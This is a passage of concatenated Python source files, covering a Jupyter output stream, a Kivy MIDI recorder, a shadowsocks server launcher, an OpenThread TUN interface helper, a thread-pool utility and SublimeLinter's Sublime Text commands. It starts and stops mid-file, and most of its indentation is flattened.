# mp.Pool cannot be trusted to flush promptly (or ever),
# and this helps.
if '\n' in string:
self.flush()
else:
self._schedule_flush()
def writelines(self, sequence):
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
for string in sequence:
self.write(string)
def _flush_buffer(self):
"""clear the current buffer and return the current buffer data.
This should only be called in the IO thread.
"""
data = u''
if self._buffer is not None:
buf = self._buffer
self._new_buffer()
data = buf.getvalue()
buf.close()
return data
def _new_buffer(self):
self._buffer = StringIO()
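# A minimal usage sketch (not executed here): the kernel application wires these classes up
# roughly as below. `session` stands for a jupyter_client Session instance and the socket
# address and stream name are illustrative only.
#
#   ctx = zmq.Context.instance()
#   iopub_socket = ctx.socket(zmq.PUB)
#   iopub_socket.bind('tcp://127.0.0.1:5555')
#   iopub_thread = IOPubThread(iopub_socket, pipe=False)
#   iopub_thread.start()
#   sys.stdout = OutStream(session, iopub_thread, u'stdout')
#   print('hello')       # forwarded to the IOPub socket as a 'stream' message
#   sys.stdout.flush()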
|
recorder.py
|
import os
from kivy.uix.boxlayout import BoxLayout
from kivy.lang import Builder
from kivy.properties import BooleanProperty, NumericProperty, StringProperty, ListProperty, OptionProperty, ObjectProperty
import threading
import time
from collections import deque
from midistream.helpers import midi_command_increase_channel, midi_program_change
Builder.load_file(os.path.join(os.path.dirname(__file__), 'recorder.kv'))
class Recorder(BoxLayout):
instrument = ObjectProperty()
reproducer = ObjectProperty()
state = StringProperty("")
position = NumericProperty(0)
rec_start_time = NumericProperty(0)
rec_prev_time = NumericProperty(0)
def __init__(self, *args, **kwargs):
super(Recorder, self).__init__(*args, **kwargs)
self.commands = deque()
self.session = 0
def on_instrument(self, instance, value):
self.instrument.bind(command=self.record_command)
def toggle_recording(self, *args):
self.session += 1
if self.state == 'rec':
self.stop_recording()
elif self.state == 'play':
self.stop_playing()
self.state = 'rec' if self.state != 'rec' else ''
if self.state == 'rec':
self.commands.clear()
self.rec_start_time = self.rec_prev_time = time.time()
self.program = self.instrument.program
def toggle_play(self, *args):
self.session += 1
if self.state == 'rec':
self.stop_recording()
self.state = 'play' if self.state != 'play' else ''
if self.state == 'play' and self.commands:
self.position = 0
self.play_prev_time = time.time()
player = threading.Thread(target=self.play_loop)
player.daemon = True
player.start()
elif self.state != 'play':
self.stop_playing()
def stop_recording(self):
if self.reproducer:
# record program change
cmd = midi_program_change(self.program,
self.instrument.channel)
else:
cmd = None # record pause
self.record_command(self.reproducer, cmd)
def stop_playing(self):
reproducer = self.reproducer or self.instrument
for note in self.instrument.played_notes:
reproducer.note_off(note)
def play_loop(self):
session = self.session
commands = self.commands_iter()
reproducer = self.reproducer or self.instrument
reproducer.program = self.program
while self.state == 'play' and self.session == session:
command, t = next(commands)
if t:
time.sleep(t)
if self.state == 'play' and self.session == session:
if command:
reproducer.command = command
self.position += 1
def commands_iter(self):
while True:
for command, t in self.commands:
yield command, t
def get_command(self, position=None):
count = len(self.commands)
if position is None:
position = self.position
if count:
command, t = self.commands[self.position % count]
return command, t
def record_command(self, instrument, command):
if self.state == 'rec':
current = time.time()
if self.commands:
t = current - self.rec_prev_time
else:
t = 0
self.rec_prev_time = current
if self.reproducer != self.instrument:
inc = self.reproducer.channel - self.instrument.channel
command = midi_command_increase_channel(command, inc)
self.commands.append((command, t))
|
api.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
from multiprocessing import Process
from shadowsocks import asyncdns, tcprelay, udprelay, eventloop, shell
# Code that exposes the API service to the outside world.
# Specifically: when a uid and its related configuration are received, start listening and run the event loop.
__all__ = ['start_server', 'stop_server', 'is_server_started']
p = dict()
def call_back(port, data_len):
print(port, data_len)
def start_server(uid, port, password, crypt_name):
def handler():
config = {
"password": password,
"method": crypt_name,
"server_port": port,
"timeout": 60,
"server": "::",
"fast_open": False
}
try:
loop = eventloop.EventLoop()
dns_resolver = asyncdns.DNSResolver()
tcp_server = tcprelay.TCPRelay(config, dns_resolver, False, stat_callback=call_back)
udp_server = udprelay.UDPRelay(config, dns_resolver, False)
dns_resolver.add_to_loop(loop)
tcp_server.add_to_loop(loop)
udp_server.add_to_loop(loop)
loop.run()
except IOError as e:
if e.errno == 98:
sys.exit(1)
except Exception as e:
shell.print_exception(e)
sys.exit(1)
if is_server_started(uid):
stop_server(uid)
prs = Process(target=handler, name=uid)
prs.daemon = True
prs.start()
p[uid] = prs
return prs.pid
def is_server_started(uid):
if uid in p.keys() and p[uid].is_alive():
return True
return False
def stop_server(uid):
if uid in p.keys():
os.kill(p[uid].pid, 4)
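# A minimal usage sketch (illustrative values only; requires the shadowsocks package and a
# free port):
#
#   pid = start_server('user-1', 8388, 'secret', 'aes-256-cfb')
#   print(is_server_started('user-1'))   # True while the relay process is alive
#   stop_server('user-1')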
|
tun.py
|
#
# Copyright (c) 2016-2017, The OpenThread Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Utility class for creating TUN network interfaces on Linux and OSX. """
import os
import sys
import struct
import logging
import threading
import traceback
import subprocess
if sys.platform == "linux" or sys.platform == "linux2":
import fcntl
from select import select
import spinel.util as util
import spinel.config as CONFIG
IFF_TUN = 0x0001
IFF_TAP = 0x0002
IFF_NO_PI = 0x1000
IFF_TUNSETIFF = 0x400454ca
IFF_TUNSETOWNER = IFF_TUNSETIFF + 2
class TunInterface(object):
""" Utility class for creating a TUN network interface. """
def __init__(self, identifier):
self.identifier = identifier
self.ifname = "tun" + str(self.identifier)
self.tun = None
self.fd = None
platform = sys.platform
if platform == "linux" or platform == "linux2":
self.__init_linux()
elif platform == "darwin":
self.__init_osx()
else:
raise RuntimeError("Platform \"{}\" is not supported.".format(platform))
self.ifconfig("up")
#self.ifconfig("inet6 add fd00::1/64")
self.__start_tun_thread()
def __init_osx(self):
CONFIG.LOGGER.info("TUN: Starting osx " + self.ifname)
filename = "/dev/" + self.ifname
self.tun = os.open(filename, os.O_RDWR)
self.fd = self.tun
# trick osx to auto-assign a link local address
self.addr_add("fe80::1")
self.addr_del("fe80::1")
def __init_linux(self):
CONFIG.LOGGER.info("TUN: Starting linux " + self.ifname)
self.tun = open("/dev/net/tun", "r+b")
self.fd = self.tun.fileno()
ifr = struct.pack("16sH", self.ifname, IFF_TUN | IFF_NO_PI)
fcntl.ioctl(self.tun, IFF_TUNSETIFF, ifr) # Name interface tun#
fcntl.ioctl(self.tun, IFF_TUNSETOWNER, 1000) # Allow non-sudo access
def close(self):
""" Close this tunnel interface. """
if self.tun:
os.close(self.fd)
self.fd = None
self.tun = None
@classmethod
def command(cls, cmd):
""" Utility to make a system call. """
subprocess.check_call(cmd, shell=True)
def ifconfig(self, args):
""" Bring interface up and/or assign addresses. """
self.command('ifconfig ' + self.ifname + ' ' + args)
def ping6(self, args):
""" Ping an address. """
cmd = 'ping6 ' + args
print(cmd)
self.command(cmd)
def addr_add(self, addr):
""" Add the given IPv6 address to the tunnel interface. """
self.ifconfig('inet6 add ' + addr)
def addr_del(self, addr):
""" Delete the given IPv6 address from the tunnel interface. """
platform = sys.platform
if platform == "linux" or platform == "linux2":
self.ifconfig('inet6 del ' + addr)
elif platform == "darwin":
self.ifconfig('inet6 delete ' + addr)
def write(self, packet):
#global gWpanApi
#gWpanApi.ip_send(packet)
# os.write(self.fd, packet) # Loop back
if CONFIG.DEBUG_TUN:
CONFIG.LOGGER.debug("\nTUN: TX (" + str(len(packet)) +
") " + util.hexify_str(packet))
def __run_tun_thread(self):
while self.fd:
try:
ready_fd = select([self.fd], [], [])[0][0]
if ready_fd == self.fd:
packet = os.read(self.fd, 4000)
if CONFIG.DEBUG_TUN:
CONFIG.LOGGER.debug("\nTUN: RX (" + str(len(packet)) + ") " +
util.hexify_str(packet))
self.write(packet)
except:
traceback.print_exc()
break
CONFIG.LOGGER.info("TUN: exiting")
if self.fd:
os.close(self.fd)
self.fd = None
def __start_tun_thread(self):
"""Start reader thread"""
self._reader_alive = True
self.receiver_thread = threading.Thread(target=self.__run_tun_thread)
self.receiver_thread.setDaemon(True)
self.receiver_thread.start()
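# A minimal usage sketch (assumes root privileges and, on Linux, an existing /dev/net/tun;
# the identifier and addresses below are illustrative only):
#
#   tun = TunInterface(identifier=1)
#   tun.addr_add('fd00::1')
#   tun.ping6('-c 1 fd00::1')
#   tun.addr_del('fd00::1')
#   tun.close()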
|
parallel.py
|
"""Utility code to execute code in parallel."""
from __future__ import absolute_import
from __future__ import print_function
import Queue
import threading
import time
from multiprocessing import cpu_count
from typing import Any, Callable, List
def parallel_process(items, func):
# type: (List[Any], Callable[[Any], bool]) -> bool
"""Run a set of work items to completion and wait."""
try:
cpus = cpu_count()
except NotImplementedError:
cpus = 1
task_queue = Queue.Queue() # type: Queue.Queue
    pp_event = threading.Event()
    # Use a list so that the worker function will capture this variable
    pp_result = [True]
pp_lock = threading.Lock()
def worker():
# type: () -> None
"""Worker thread to process work items in parallel."""
while not pp_event.is_set():
try:
item = task_queue.get_nowait()
except Queue.Empty:
# if the queue is empty, exit the worker thread
pp_event.set()
return
try:
ret = func(item)
finally:
# Tell the queue we finished with the item
task_queue.task_done()
# Return early if we fail, and signal we are done
if not ret:
with pp_lock:
pp_result[0] = False
pp_event.set()
return
# Enqueue all the work we want to process
for item in items:
task_queue.put(item)
# Process all the work
threads = []
for _ in range(cpus):
thread = threading.Thread(target=worker)
thread.daemon = True
thread.start()
threads.append(thread)
# Wait for the threads to finish
# Loop with a timeout so that we can process Ctrl-C interrupts
while not pp_event.wait(1):
time.sleep(1)
for thread in threads:
thread.join()
return pp_result[0]
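# A minimal usage sketch: run a trivial predicate over a list of work items in parallel.
# The work function below is illustrative only; parallel_process() returns False as soon as
# any item's function returns a falsy value.
if __name__ == '__main__':
    def _is_small_square(item):
        # type: (int) -> bool
        """Succeed only for items whose square is below 100."""
        return item * item < 100

    print(parallel_process(list(range(5)), _is_small_square))      # True
    print(parallel_process(list(range(5, 20)), _is_small_square))  # False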
|
commands.py
|
# coding: utf-8
#
# commands.py
# Part of SublimeLinter3, a code checking framework for Sublime Text 3
#
# Written by Ryan Hileman and Aparajita Fishman
#
# Project: https://github.com/SublimeLinter/SublimeLinter3
# License: MIT
#
"""This module implements the Sublime Text commands provided by SublimeLinter."""
import datetime
from fnmatch import fnmatch
from glob import glob
import json
import os
import re
import shutil
import subprocess
import tempfile
from textwrap import TextWrapper
from threading import Thread
import time
import sublime
import sublime_plugin
from .lint import highlight, linter, persist, util
def error_command(method):
"""
A decorator that executes method only if the current view has errors.
This decorator is meant to be used only with the run method of
sublime_plugin.TextCommand subclasses.
A wrapped version of method is returned.
"""
def run(self, edit, **kwargs):
vid = self.view.id()
if vid in persist.errors and persist.errors[vid]:
method(self, self.view, persist.errors[vid], persist.highlights[vid], **kwargs)
else:
sublime.message_dialog('No lint errors.')
return run
def select_line(view, line):
"""Change view's selection to be the given line."""
point = view.text_point(line, 0)
sel = view.sel()
sel.clear()
sel.add(view.line(point))
class SublimelinterLintCommand(sublime_plugin.TextCommand):
"""A command that lints the current view if it has a linter."""
def is_enabled(self):
"""
Return True if the current view can be linted.
If the view has *only* file-only linters, it can be linted
only if the view is not dirty.
Otherwise it can be linted.
"""
has_non_file_only_linter = False
vid = self.view.id()
linters = persist.view_linters.get(vid, [])
for lint in linters:
if lint.tempfile_suffix != '-':
has_non_file_only_linter = True
break
if not has_non_file_only_linter:
return not self.view.is_dirty()
return True
def run(self, edit):
"""Lint the current view."""
from .sublimelinter import SublimeLinter
SublimeLinter.shared_plugin().lint(self.view.id())
class HasErrorsCommand:
"""
A mixin class for sublime_plugin.TextCommand subclasses.
Inheriting from this class will enable the command only if the current view has errors.
"""
def is_enabled(self):
"""Return True if the current view has errors."""
vid = self.view.id()
return vid in persist.errors and len(persist.errors[vid]) > 0
class GotoErrorCommand(sublime_plugin.TextCommand):
"""A superclass for commands that go to the next/previous error."""
def goto_error(self, view, errors, direction='next'):
"""Go to the next/previous error in view."""
sel = view.sel()
if len(sel) == 0:
sel.add(sublime.Region(0, 0))
saved_sel = tuple(sel)
empty_selection = len(sel) == 1 and sel[0].empty()
# sublime.Selection() changes the view's selection, get the point first
point = sel[0].begin() if direction == 'next' else sel[-1].end()
regions = sublime.Selection(view.id())
regions.clear()
for error_type in (highlight.WARNING, highlight.ERROR):
regions.add_all(view.get_regions(highlight.MARK_KEY_FORMAT.format(error_type)))
region_to_select = None
# If going forward, find the first region beginning after the point.
# If going backward, find the first region ending before the point.
# If nothing is found in the given direction, wrap to the first/last region.
if direction == 'next':
for region in regions:
if (
(point == region.begin() and empty_selection and not region.empty())
or (point < region.begin())
):
region_to_select = region
break
else:
for region in reversed(regions):
if (
(point == region.end() and empty_selection and not region.empty())
or (point > region.end())
):
region_to_select = region
break
# If there is only one error line and the cursor is in that line, we cannot move.
# Otherwise wrap to the first/last error line unless settings disallow that.
if region_to_select is None and ((len(regions) > 1 or not regions[0].contains(point))):
if persist.settings.get('wrap_find', True):
region_to_select = regions[0] if direction == 'next' else regions[-1]
if region_to_select is not None:
self.select_lint_region(self.view, region_to_select)
else:
sel.clear()
sel.add_all(saved_sel)
sublime.message_dialog('No {0} lint error.'.format(direction))
@classmethod
def select_lint_region(cls, view, region):
"""
Select and scroll to the first marked region that contains region.
If none are found, the beginning of region is used. The view is
centered on the calculated region and the region is selected.
"""
marked_region = cls.find_mark_within(view, region)
if marked_region is None:
marked_region = sublime.Region(region.begin(), region.begin())
sel = view.sel()
sel.clear()
sel.add(marked_region)
# There is a bug in ST3 that prevents the selection from changing
# when a quick panel is open and the viewport does not change position,
# so we call our own custom method that works around that.
util.center_region_in_view(marked_region, view)
@classmethod
def find_mark_within(cls, view, region):
"""Return the nearest marked region that contains region, or None if none found."""
marks = view.get_regions(highlight.MARK_KEY_FORMAT.format(highlight.WARNING))
marks.extend(view.get_regions(highlight.MARK_KEY_FORMAT.format(highlight.ERROR)))
marks.sort(key=sublime.Region.begin)
for mark in marks:
if mark.contains(region):
return mark
return None
class SublimelinterGotoErrorCommand(GotoErrorCommand):
"""A command that selects the next/previous error."""
@error_command
def run(self, view, errors, highlights, **kwargs):
"""Run the command."""
self.goto_error(view, errors, **kwargs)
class SublimelinterShowAllErrors(sublime_plugin.TextCommand):
"""A command that shows a quick panel with all of the errors in the current view."""
@error_command
def run(self, view, errors, highlights):
"""Run the command."""
self.errors = errors
self.highlights = highlights
self.points = []
options = []
for lineno, line_errors in sorted(errors.items()):
if persist.settings.get("passive_warnings", False):
if self.highlights.line_type(lineno) != highlight.ERROR:
continue
line = view.substr(view.full_line(view.text_point(lineno, 0))).rstrip('\n\r')
# Strip whitespace from the front of the line, but keep track of how much was
# stripped so we can adjust the column.
diff = len(line)
line = line.lstrip()
diff -= len(line)
max_prefix_len = 40
for column, message in sorted(line_errors):
# Keep track of the line and column
point = view.text_point(lineno, column)
self.points.append(point)
# If there are more than max_prefix_len characters before the adjusted column,
# lop off the excess and insert an ellipsis.
column = max(column - diff, 0)
if column > max_prefix_len:
visible_line = '...' + line[column - max_prefix_len:]
column = max_prefix_len + 3 # 3 for ...
else:
visible_line = line
# Insert an arrow at the column in the stripped line
code = visible_line[:column] + '➜' + visible_line[column:]
options.append(['{} {}'.format(lineno + 1, message), code])
self.viewport_pos = view.viewport_position()
self.selection = list(view.sel())
view.window().show_quick_panel(
options,
on_select=self.select_error,
on_highlight=self.select_error
)
def select_error(self, index):
"""Completion handler for the quick panel. Selects the indexed error."""
if index != -1:
point = self.points[index]
GotoErrorCommand.select_lint_region(self.view, sublime.Region(point, point))
else:
self.view.set_viewport_position(self.viewport_pos)
self.view.sel().clear()
self.view.sel().add_all(self.selection)
class SublimelinterToggleSettingCommand(sublime_plugin.WindowCommand):
"""Command that toggles a setting."""
def __init__(self, window):
"""Initialize a new instance."""
super().__init__(window)
def is_visible(self, **args):
"""Return True if the opposite of the setting is True."""
if args.get('checked', False):
return True
if persist.settings.has_setting(args['setting']):
setting = persist.settings.get(args['setting'], None)
return setting is not None and setting is not args['value']
else:
return args['value'] is not None
def is_checked(self, **args):
"""Return True if the setting should be checked."""
if args.get('checked', False):
setting = persist.settings.get(args['setting'], False)
return setting is True
else:
return False
def run(self, **args):
"""Toggle the setting if value is boolean, or remove it if None."""
if 'value' in args:
if args['value'] is None:
persist.settings.pop(args['setting'])
else:
persist.settings.set(args['setting'], args['value'], changed=True)
else:
setting = persist.settings.get(args['setting'], False)
persist.settings.set(args['setting'], not setting, changed=True)
persist.settings.save()
class ChooseSettingCommand(sublime_plugin.WindowCommand):
"""An abstract base class for commands that choose a setting from a list."""
def __init__(self, window, setting=None, preview=False):
"""Initialize a new instance."""
super().__init__(window)
self.setting = setting
self._settings = None
self.preview = preview
def description(self, **args):
"""Return the visible description of the command, used in menus."""
return args.get('value', None)
def is_checked(self, **args):
"""Return whether this command should be checked in a menu."""
if 'value' not in args:
return False
item = self.transform_setting(args['value'], matching=True)
setting = self.setting_value(matching=True)
return item == setting
def _get_settings(self):
"""Return the list of settings."""
if self._settings is None:
self._settings = self.get_settings()
return self._settings
settings = property(_get_settings)
def get_settings(self):
"""Return the list of settings. Subclasses must override this."""
raise NotImplementedError
def transform_setting(self, setting, matching=False):
"""
Transform the display text for setting to the form it is stored in.
By default, returns a lowercased copy of setting.
"""
return setting.lower()
def setting_value(self, matching=False):
"""Return the current value of the setting."""
return self.transform_setting(persist.settings.get(self.setting, ''), matching=matching)
def on_highlight(self, index):
"""If preview is on, set the selected setting."""
if self.preview:
self.set(index)
def choose(self, **kwargs):
"""
Choose or set the setting.
If 'value' is in kwargs, the setting is set to the corresponding value.
Otherwise the list of available settings is built via get_settings
and is displayed in a quick panel. The current value of the setting
is initially selected in the quick panel.
"""
if 'value' in kwargs:
setting = self.transform_setting(kwargs['value'])
else:
setting = self.setting_value(matching=True)
index = 0
for i, s in enumerate(self.settings):
if isinstance(s, (tuple, list)):
s = self.transform_setting(s[0])
else:
s = self.transform_setting(s)
if s == setting:
index = i
break
if 'value' in kwargs:
self.set(index)
else:
self.previous_setting = self.setting_value()
self.window.show_quick_panel(
self.settings,
on_select=self.set,
selected_index=index,
on_highlight=self.on_highlight)
def set(self, index):
"""Set the value of the setting."""
if index == -1:
if self.settings_differ(self.previous_setting, self.setting_value()):
self.update_setting(self.previous_setting)
return
setting = self.selected_setting(index)
if isinstance(setting, (tuple, list)):
setting = setting[0]
setting = self.transform_setting(setting)
if not self.settings_differ(persist.settings.get(self.setting, ''), setting):
return
self.update_setting(setting)
def update_setting(self, value):
"""Update the setting with the given value."""
persist.settings.set(self.setting, value, changed=True)
self.setting_was_changed(value)
persist.settings.save()
def settings_differ(self, old_setting, new_setting):
"""Return whether two setting values differ."""
if isinstance(new_setting, (tuple, list)):
new_setting = new_setting[0]
new_setting = self.transform_setting(new_setting)
return new_setting != old_setting
def selected_setting(self, index):
"""
Return the selected setting by index.
Subclasses may override this if they want to return something other
than the indexed value from self.settings.
"""
return self.settings[index]
def setting_was_changed(self, setting):
"""
Do something after the setting value is changed but before settings are saved.
Subclasses may override this if further action is necessary after
the setting's value is changed.
"""
pass
def choose_setting_command(setting, preview):
"""Return a decorator that provides common methods for concrete subclasses of ChooseSettingCommand."""
def decorator(cls):
def init(self, window):
super(cls, self).__init__(window, setting, preview)
def run(self, **kwargs):
"""Run the command."""
self.choose(**kwargs)
cls.setting = setting
cls.__init__ = init
cls.run = run
return cls
return decorator
@choose_setting_command('lint_mode', preview=False)
class SublimelinterChooseLintModeCommand(ChooseSettingCommand):
"""A command that selects a lint mode from a list."""
def get_settings(self):
"""Return a list of the lint modes."""
return [[name.capitalize(), description] for name, description in persist.LINT_MODES]
def setting_was_changed(self, setting):
"""Update all views when the lint mode changes."""
if setting == 'background':
from .sublimelinter import SublimeLinter
SublimeLinter.lint_all_views()
else:
linter.Linter.clear_all()
@choose_setting_command('mark_style', preview=True)
class SublimelinterChooseMarkStyleCommand(ChooseSettingCommand):
"""A command that selects a mark style from a list."""
def get_settings(self):
"""Return a list of the mark styles."""
return highlight.mark_style_names()
@choose_setting_command('gutter_theme', preview=True)
class SublimelinterChooseGutterThemeCommand(ChooseSettingCommand):
"""A command that selects a gutter theme from a list."""
def get_settings(self):
"""
Return a list of all available gutter themes, with 'None' at the end.
Whether the theme is colorized and is a SublimeLinter or user theme
is indicated below the theme name.
"""
settings = self.find_gutter_themes()
settings.append(['None', 'Do not display gutter marks'])
self.themes.append('none')
return settings
def find_gutter_themes(self):
"""
Find all SublimeLinter.gutter-theme resources.
For each found resource, if it doesn't match one of the patterns
from the "gutter_theme_excludes" setting, return the base name
of resource and info on whether the theme is a standard theme
or a user theme, as well as whether it is colorized.
The list of paths to the resources is appended to self.themes.
"""
self.themes = []
settings = []
gutter_themes = sublime.find_resources('*.gutter-theme')
excludes = persist.settings.get('gutter_theme_excludes', [])
pngs = sublime.find_resources('*.png')
for theme in gutter_themes:
# Make sure the theme has error.png and warning.png
exclude = False
parent = os.path.dirname(theme)
for name in ('error', 'warning'):
if '{}/{}.png'.format(parent, name) not in pngs:
exclude = True
if exclude:
continue
# Now see if the theme name is in gutter_theme_excludes
name = os.path.splitext(os.path.basename(theme))[0]
for pattern in excludes:
if fnmatch(name, pattern):
exclude = True
break
if exclude:
continue
self.themes.append(theme)
try:
info = json.loads(sublime.load_resource(theme))
colorize = info.get('colorize', False)
except ValueError:
colorize = False
std_theme = theme.startswith('Packages/SublimeLinter/gutter-themes/')
settings.append([
name,
'{}{}'.format(
'SublimeLinter theme' if std_theme else 'User theme',
' (colorized)' if colorize else ''
)
])
# Sort self.themes and settings in parallel using the zip trick
settings, self.themes = zip(*sorted(zip(settings, self.themes)))
# zip returns tuples, convert back to lists
settings = list(settings)
self.themes = list(self.themes)
return settings
def selected_setting(self, index):
"""Return the theme name with the given index."""
return self.themes[index]
def transform_setting(self, setting, matching=False):
"""
Return a transformed version of setting.
For gutter themes, setting is a Packages-relative path
to a .gutter-theme file.
If matching == False, return the original setting text,
gutter theme settings are not lowercased.
If matching == True, return the base name of the filename
without the .gutter-theme extension.
"""
if matching:
return os.path.splitext(os.path.basename(setting))[0]
else:
return setting
class SublimelinterToggleLinterCommand(sublime_plugin.WindowCommand):
"""A command that toggles, enables, or disables linter plugins."""
def __init__(self, window):
"""Initialize a new instance."""
super().__init__(window)
self.linters = {}
def is_visible(self, **args):
"""Return True if the command would show any linters."""
which = args['which']
if self.linters.get(which) is None:
linters = []
settings = persist.settings.get('linters', {})
for instance in persist.linter_classes:
linter_settings = settings.get(instance, {})
disabled = linter_settings.get('@disable')
if which == 'all':
include = True
instance = [instance, 'disabled' if disabled else 'enabled']
else:
include = (
which == 'enabled' and not disabled or
which == 'disabled' and disabled
)
if include:
linters.append(instance)
linters.sort()
self.linters[which] = linters
return len(self.linters[which]) > 0
def run(self, **args):
"""Run the command."""
self.which = args['which']
if self.linters[self.which]:
self.window.show_quick_panel(self.linters[self.which], self.on_done)
def on_done(self, index):
"""Completion handler for quick panel, toggle the enabled state of the chosen linter."""
if index != -1:
linter = self.linters[self.which][index]
if isinstance(linter, list):
linter = linter[0]
settings = persist.settings.get('linters', {})
linter_settings = settings.get(linter, {})
linter_settings['@disable'] = not linter_settings.get('@disable', False)
persist.settings.set('linters', settings, changed=True)
persist.settings.save()
self.linters = {}
class SublimelinterCreateLinterPluginCommand(sublime_plugin.WindowCommand):
"""A command that creates a new linter plugin."""
def run(self):
"""Run the command."""
if not sublime.ok_cancel_dialog(
'You will be asked for the linter name. Please enter the name '
'of the linter binary (including dashes), NOT the name of the language being linted. '
'For example, to lint CSS with csslint, the linter name is '
'“csslint”, NOT “css”.',
'I understand'
):
return
self.window.show_input_panel(
'Linter name:',
'',
on_done=self.copy_linter,
on_change=None,
on_cancel=None)
def copy_linter(self, name):
"""Copy the template linter to a new linter with the given name."""
self.name = name
self.fullname = 'SublimeLinter-contrib-{}'.format(name)
self.dest = os.path.join(sublime.packages_path(), self.fullname)
if os.path.exists(self.dest):
sublime.error_message('The plugin “{}” already exists.'.format(self.fullname))
return
src = os.path.join(sublime.packages_path(), persist.PLUGIN_DIRECTORY, 'linter-plugin-template')
self.temp_dir = None
try:
self.temp_dir = tempfile.mkdtemp()
self.temp_dest = os.path.join(self.temp_dir, self.fullname)
shutil.copytree(src, self.temp_dest)
self.get_linter_language(name, self.configure_linter)
except Exception as ex:
if self.temp_dir and os.path.exists(self.temp_dir):
shutil.rmtree(self.temp_dir)
sublime.error_message('An error occurred while copying the template plugin: {}'.format(str(ex)))
def configure_linter(self, language):
"""Fill out the template and move the linter into Packages."""
try:
if language is None:
return
if not self.fill_template(self.temp_dir, self.name, self.fullname, language):
return
git = util.which('git')
if git:
subprocess.call((git, 'init', self.temp_dest))
shutil.move(self.temp_dest, self.dest)
util.open_directory(self.dest)
self.wait_for_open(self.dest)
except Exception as ex:
sublime.error_message('An error occurred while configuring the plugin: {}'.format(str(ex)))
finally:
if self.temp_dir and os.path.exists(self.temp_dir):
shutil.rmtree(self.temp_dir)
def get_linter_language(self, name, callback):
"""Get the language (python, node, etc.) on which the linter is based."""
languages = ['javascript', 'python', 'ruby', 'other']
items = ['Select the language on which the linter is based:']
for language in languages:
items.append(' ' + language.capitalize())
def on_done(index):
language = languages[index - 1] if index > 0 else None
callback(language)
self.window.show_quick_panel(items, on_done)
def fill_template(self, template_dir, name, fullname, language):
"""Replace placeholders and fill template files in template_dir, return success."""
# Read per-language info
path = os.path.join(os.path.dirname(__file__), 'create_linter_info.json')
with open(path, mode='r', encoding='utf-8') as f:
try:
info = json.load(f)
except Exception as err:
persist.printf(err)
sublime.error_message('A configuration file could not be opened, the linter cannot be created.')
return False
info = info.get(language, {})
extra_attributes = []
comment_re = info.get('comment_re', 'None')
extra_attributes.append('comment_re = ' + comment_re)
attributes = info.get('attributes', [])
for attr in attributes:
extra_attributes.append(attr.format(name))
extra_attributes = '\n '.join(extra_attributes)
if extra_attributes:
extra_attributes += '\n'
extra_steps = info.get('extra_steps', '')
if isinstance(extra_steps, list):
extra_steps = '\n\n'.join(extra_steps)
if extra_steps:
extra_steps = '\n' + extra_steps + '\n'
platform = info.get('platform', language.capitalize())
# Replace placeholders
placeholders = {
'__linter__': name,
'__user__': util.get_user_fullname(),
'__year__': str(datetime.date.today().year),
'__class__': self.camel_case(name),
'__superclass__': info.get('superclass', 'Linter'),
'__cmd__': '{}@python'.format(name) if language == 'python' else name,
'__extra_attributes__': extra_attributes,
'__platform__': platform,
'__install__': info['installer'].format(name),
'__extra_install_steps__': extra_steps
}
for root, dirs, files in os.walk(template_dir):
for filename in files:
extension = os.path.splitext(filename)[1]
if extension in ('.py', '.md', '.txt'):
path = os.path.join(root, filename)
with open(path, encoding='utf-8') as f:
text = f.read()
for placeholder, value in placeholders.items():
text = text.replace(placeholder, value)
with open(path, mode='w', encoding='utf-8') as f:
f.write(text)
return True
def camel_case(self, name):
"""Convert and return a name in the form foo-bar to FooBar."""
camel_name = name[0].capitalize()
i = 1
while i < len(name):
if name[i] == '-' and i < len(name) - 1:
camel_name += name[i + 1].capitalize()
i += 1
else:
camel_name += name[i]
i += 1
return camel_name
def wait_for_open(self, dest):
"""Wait for new linter window to open in another thread."""
def open_linter_py():
"""Wait until the new linter window has opened and open linter.py."""
start = datetime.datetime.now()
while True:
time.sleep(0.25)
delta = datetime.datetime.now() - start
# Wait a maximum of 5 seconds
if delta.seconds > 5:
break
window = sublime.active_window()
folders = window.folders()
if folders and folders[0] == dest:
window.open_file(os.path.join(dest, 'linter.py'))
break
sublime.set_timeout_async(open_linter_py, 0)
class SublimelinterPackageControlCommand(sublime_plugin.WindowCommand):
"""
Abstract superclass for Package Control utility commands.
Only works if git is installed.
"""
TAG_RE = re.compile(r'(?P<major>\d+)\.(?P<minor>\d+)\.(?P<release>\d+)(?:\+\d+)?')
def __init__(self, window):
"""Initialize a new instance."""
super().__init__(window)
self.git = ''
def is_visible(self, paths=[]):
"""Return True if any eligible plugin directories are selected."""
if self.git == '':
self.git = util.which('git')
if self.git:
for path in paths:
if self.is_eligible_path(path):
return True
return False
def is_eligible_path(self, path):
"""
Return True if path is an eligible directory.
A directory is eligible if it has a messages subdirectory
and has messages.json.
"""
return (
os.path.isdir(path) and
os.path.isdir(os.path.join(path, 'messages')) and
os.path.isfile(os.path.join(path, 'messages.json'))
)
def get_current_tag(self):
"""
Return the most recent tag components.
A tuple of (major, minor, release) is returned, or (1, 0, 0) if there are no tags.
If the most recent tag does not conform to semver, return (None, None, None).
"""
tag = util.communicate(['git', 'describe', '--tags', '--abbrev=0']).strip()
if not tag:
return (1, 0, 0)
match = self.TAG_RE.match(tag)
if match:
return (int(match.group('major')), int(match.group('minor')), int(match.group('release')))
else:
return None
class SublimelinterNewPackageControlMessageCommand(SublimelinterPackageControlCommand):
"""
This command automates the process of creating new Package Control release messages.
It creates a new entry in messages.json for the next version
and creates a new file named messages/<version>.txt.
"""
COMMIT_MSG_RE = re.compile(r'{{{{(.+?)}}}}')
def __init__(self, window):
"""Initialize a new instance."""
super().__init__(window)
def run(self, paths=[]):
"""Run the command."""
for path in paths:
if self.is_eligible_path(path):
self.make_new_version_message(path)
def make_new_version_message(self, path):
"""Make a new version message for the repo at the given path."""
try:
cwd = os.getcwd()
os.chdir(path)
version = self.get_current_tag()
if version[0] is None:
return
messages_path = os.path.join(path, 'messages.json')
message_path = self.rewrite_messages_json(messages_path, version)
if os.path.exists(message_path):
